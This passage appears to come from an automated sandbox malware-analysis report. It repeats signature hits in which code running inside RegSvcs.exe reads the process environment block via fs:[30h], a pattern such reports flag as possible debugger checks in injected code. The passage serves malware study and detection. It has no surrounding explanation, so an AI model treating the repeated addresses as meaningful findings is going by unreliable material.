                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01137190 mov eax, dword ptr fs:[00000030h]9_2_01137190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116019F mov eax, dword ptr fs:[00000030h]9_2_0116019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116019F mov eax, dword ptr fs:[00000030h]9_2_0116019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116019F mov eax, dword ptr fs:[00000030h]9_2_0116019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116019F mov eax, dword ptr fs:[00000030h]9_2_0116019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119C188 mov eax, dword ptr fs:[00000030h]9_2_0119C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119C188 mov eax, dword ptr fs:[00000030h]9_2_0119C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01120185 mov eax, dword ptr fs:[00000030h]9_2_01120185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DA197 mov eax, dword ptr fs:[00000030h]9_2_010DA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DA197 mov eax, dword ptr fs:[00000030h]9_2_010DA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DA197 mov eax, dword ptr fs:[00000030h]9_2_010DA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011911A4 mov eax, dword ptr fs:[00000030h]9_2_011911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011911A4 mov eax, dword ptr fs:[00000030h]9_2_011911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011911A4 mov eax, dword ptr fs:[00000030h]9_2_011911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011911A4 mov eax, dword ptr fs:[00000030h]9_2_011911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FB1B0 mov eax, dword ptr fs:[00000030h]9_2_010FB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111D1D0 mov eax, dword ptr fs:[00000030h]9_2_0111D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111D1D0 mov ecx, dword ptr fs:[00000030h]9_2_0111D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115E1D0 mov eax, dword ptr fs:[00000030h]9_2_0115E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115E1D0 mov eax, dword ptr fs:[00000030h]9_2_0115E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115E1D0 mov ecx, dword ptr fs:[00000030h]9_2_0115E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115E1D0 mov eax, dword ptr fs:[00000030h]9_2_0115E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115E1D0 mov eax, dword ptr fs:[00000030h]9_2_0115E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B51CB mov eax, dword ptr fs:[00000030h]9_2_011B51CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A61C3 mov eax, dword ptr fs:[00000030h]9_2_011A61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A61C3 mov eax, dword ptr fs:[00000030h]9_2_011A61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011871F9 mov esi, dword ptr fs:[00000030h]9_2_011871F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E51ED mov eax, dword ptr fs:[00000030h]9_2_010E51ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011101F8 mov eax, dword ptr fs:[00000030h]9_2_011101F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B61E5 mov eax, dword ptr fs:[00000030h]9_2_011B61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011051EF mov eax, dword ptr fs:[00000030h]9_2_011051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01164000 mov ecx, dword ptr fs:[00000030h]9_2_01164000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE016 mov eax, dword ptr fs:[00000030h]9_2_010FE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE016 mov eax, dword ptr fs:[00000030h]9_2_010FE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE016 mov eax, dword ptr fs:[00000030h]9_2_010FE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE016 mov eax, dword ptr fs:[00000030h]9_2_010FE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A903E mov eax, dword ptr fs:[00000030h]9_2_011A903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A903E mov eax, dword ptr fs:[00000030h]9_2_011A903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A903E mov eax, dword ptr fs:[00000030h]9_2_011A903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A903E mov eax, dword ptr fs:[00000030h]9_2_011A903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DA020 mov eax, dword ptr fs:[00000030h]9_2_010DA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DC020 mov eax, dword ptr fs:[00000030h]9_2_010DC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B052 mov eax, dword ptr fs:[00000030h]9_2_0110B052
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118705E mov ebx, dword ptr fs:[00000030h]9_2_0118705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118705E mov eax, dword ptr fs:[00000030h]9_2_0118705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166050 mov eax, dword ptr fs:[00000030h]9_2_01166050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E2050 mov eax, dword ptr fs:[00000030h]9_2_010E2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110C073 mov eax, dword ptr fs:[00000030h]9_2_0110C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D070 mov ecx, dword ptr fs:[00000030h]9_2_0115D070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116106E mov eax, dword ptr fs:[00000030h]9_2_0116106E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B5060 mov eax, dword ptr fs:[00000030h]9_2_011B5060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov ecx, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1070 mov eax, dword ptr fs:[00000030h]9_2_010F1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DD08D mov eax, dword ptr fs:[00000030h]9_2_010DD08D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110D090 mov eax, dword ptr fs:[00000030h]9_2_0110D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110D090 mov eax, dword ptr fs:[00000030h]9_2_0110D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E208A mov eax, dword ptr fs:[00000030h]9_2_010E208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111909C mov eax, dword ptr fs:[00000030h]9_2_0111909C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116D080 mov eax, dword ptr fs:[00000030h]9_2_0116D080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116D080 mov eax, dword ptr fs:[00000030h]9_2_0116D080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E5096 mov eax, dword ptr fs:[00000030h]9_2_010E5096
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A60B8 mov eax, dword ptr fs:[00000030h]9_2_011A60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A60B8 mov ecx, dword ptr fs:[00000030h]9_2_011A60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011780A8 mov eax, dword ptr fs:[00000030h]9_2_011780A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B50D9 mov eax, dword ptr fs:[00000030h]9_2_011B50D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011620DE mov eax, dword ptr fs:[00000030h]9_2_011620DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011090DB mov eax, dword ptr fs:[00000030h]9_2_011090DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov ecx, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov ecx, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov ecx, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov ecx, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C0 mov eax, dword ptr fs:[00000030h]9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D0C0 mov eax, dword ptr fs:[00000030h]9_2_0115D0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D0C0 mov eax, dword ptr fs:[00000030h]9_2_0115D0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011220F0 mov ecx, dword ptr fs:[00000030h]9_2_011220F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E80E9 mov eax, dword ptr fs:[00000030h]9_2_010E80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DA0E3 mov ecx, dword ptr fs:[00000030h]9_2_010DA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011050E4 mov eax, dword ptr fs:[00000030h]9_2_011050E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011050E4 mov ecx, dword ptr fs:[00000030h]9_2_011050E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011660E0 mov eax, dword ptr fs:[00000030h]9_2_011660E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DC0F0 mov eax, dword ptr fs:[00000030h]9_2_010DC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01100310 mov ecx, dword ptr fs:[00000030h]9_2_01100310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111A30B mov eax, dword ptr fs:[00000030h]9_2_0111A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111A30B mov eax, dword ptr fs:[00000030h]9_2_0111A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111A30B mov eax, dword ptr fs:[00000030h]9_2_0111A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DC310 mov ecx, dword ptr fs:[00000030h]9_2_010DC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116930B mov eax, dword ptr fs:[00000030h]9_2_0116930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116930B mov eax, dword ptr fs:[00000030h]9_2_0116930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116930B mov eax, dword ptr fs:[00000030h]9_2_0116930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A132D mov eax, dword ptr fs:[00000030h]9_2_011A132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A132D mov eax, dword ptr fs:[00000030h]9_2_011A132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F32A mov eax, dword ptr fs:[00000030h]9_2_0110F32A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D7330 mov eax, dword ptr fs:[00000030h]9_2_010D7330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DD34C mov eax, dword ptr fs:[00000030h]9_2_010DD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DD34C mov eax, dword ptr fs:[00000030h]9_2_010DD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AA352 mov eax, dword ptr fs:[00000030h]9_2_011AA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116035C mov eax, dword ptr fs:[00000030h]9_2_0116035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116035C mov eax, dword ptr fs:[00000030h]9_2_0116035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116035C mov eax, dword ptr fs:[00000030h]9_2_0116035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116035C mov ecx, dword ptr fs:[00000030h]9_2_0116035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116035C mov eax, dword ptr fs:[00000030h]9_2_0116035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116035C mov eax, dword ptr fs:[00000030h]9_2_0116035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B5341 mov eax, dword ptr fs:[00000030h]9_2_011B5341
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9353 mov eax, dword ptr fs:[00000030h]9_2_010D9353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9353 mov eax, dword ptr fs:[00000030h]9_2_010D9353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01162349 mov eax, dword ptr fs:[00000030h]9_2_01162349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118437C mov eax, dword ptr fs:[00000030h]9_2_0118437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119F367 mov eax, dword ptr fs:[00000030h]9_2_0119F367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E7370 mov eax, dword ptr fs:[00000030h]9_2_010E7370
